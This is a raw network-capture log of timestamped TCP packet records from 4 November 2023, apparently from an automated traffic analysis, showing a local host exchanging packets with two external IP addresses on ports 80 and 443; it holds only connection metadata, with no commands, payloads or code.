                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.833137989 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.833539963 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.833758116 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.834063053 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.834140062 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.834458113 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.834520102 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.834786892 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.836193085 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.836309910 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.836513042 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.836792946 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.837419033 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.837620974 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.839035034 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.839447975 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.839513063 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.842469931 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.842689991 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.848165989 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.848475933 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.848668098 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.849071980 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.850941896 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.850972891 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.851428032 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.854552984 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.883090973 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.883330107 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.883694887 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.884082079 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:21.062109947 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:21.062150955 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:21.062181950 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:21.062215090 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:22.391243935 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:22.391278028 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:22.391295910 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:22.391410112 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:22.391580105 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:22.635979891 CET4973780192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:22.727957964 CET8049737162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:22.728193045 CET4973780192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:22.728439093 CET4973780192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:22.820291042 CET8049737162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:22.832062960 CET8049737162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:22.832202911 CET4973780192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:22.840111971 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:22.840164900 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:22.840233088 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:22.851953030 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:22.851998091 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.046866894 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.047199965 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.230551958 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.230587959 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.231000900 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.231064081 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.234457016 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.282449007 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.429936886 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.429996967 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.430022001 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.430048943 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.430062056 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.430087090 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.430087090 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.430098057 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.430128098 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.430135012 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.430170059 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.430176020 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.430216074 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.430242062 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.430278063 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.430283070 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.430319071 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.430502892 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.430541992 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.430546999 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.430578947 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.430584908 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.430619001 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.430639029 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.430674076 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.430680037 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.430721045 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.430749893 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.430788040 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.431327105 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.431379080 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.431394100 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.431438923 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.431458950 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.431493044 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.431562901 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.431597948 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.431724072 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.431767941 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.431783915 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.431833982 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.432305098 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.432351112 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.432425022 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.432472944 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.432482004 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.432518005 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.432523966 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.432565928 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.435856104 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.435909986 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.435945988 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.435986996 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.436085939 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.436122894 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.436131954 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.436165094 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.436322927 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.436362028 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.436373949 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.436407089 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.436420918 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.436458111 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.436464071 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.436497927 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.437021971 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.437068939 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.437077999 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.437113047 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.437134027 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.437169075 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.437222958 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.437263012 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.437268972 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.437303066 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.437309980 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.437345028 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.437763929 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.437808037 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.437813044 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.437844038 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.437860012 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.437901974 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.438174963 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.438232899 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.521787882 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.521929026 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.522001982 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.522135973 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.522443056 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.522489071 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.522598982 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.522645950 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.522830963 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.522880077 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.523251057 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.523314953 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.524291992 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.524353027 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.524454117 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.524507999 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.524705887 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.524764061 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.528377056 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.528491974 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.528888941 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.528949022 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.529545069 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.529611111 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.529824972 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.529886961 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.530908108 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.530965090 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.531229973 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.531277895 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.531461000 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.531611919 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.613584995 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.613687038 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.614188910 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.614245892 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.614542007 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.614589930 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.614722967 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.614778996 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.614870071 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.614923000 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.614952087 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.615000010 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.615078926 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.615123034 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.615673065 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.615731955 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.616266966 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.616301060 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.616322041 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.616332054 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.616369963 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.616383076 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.617151976 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.617204905 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.617211103 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.617216110 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.617237091 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.617242098 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.617264986 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.617269039 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.617292881 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.617320061 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.618144989 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.618180990 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.618204117 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.618207932 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.618235111 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.618257046 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.619002104 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.619069099 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.619484901 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.619532108 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.619538069 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.619545937 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.619569063 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.619581938 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.620368958 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.620429039 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.620495081 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.620537996 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.621454000 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.621490955 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.621515989 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.621524096 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.621550083 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.621563911 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.622137070 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.622180939 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.623245001 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.623253107 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.623284101 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.623311043 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.623320103 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.623334885 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.623369932 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.625061035 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.625083923 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.625124931 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.625132084 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.625153065 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.625176907 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.626015902 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.626053095 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.626076937 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.626084089 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.626107931 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.626142979 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.627829075 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.627845049 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.627914906 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.627923965 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.627969980 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.629697084 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.629710913 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.629771948 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.629781008 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.629820108 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.631431103 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.631450891 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.631494999 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.631517887 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.631522894 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.631563902 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.633275986 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.633294106 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.633358002 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.633366108 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.633407116 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.705845118 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.705873013 CET44349738162.159.129.233192.168.2.4
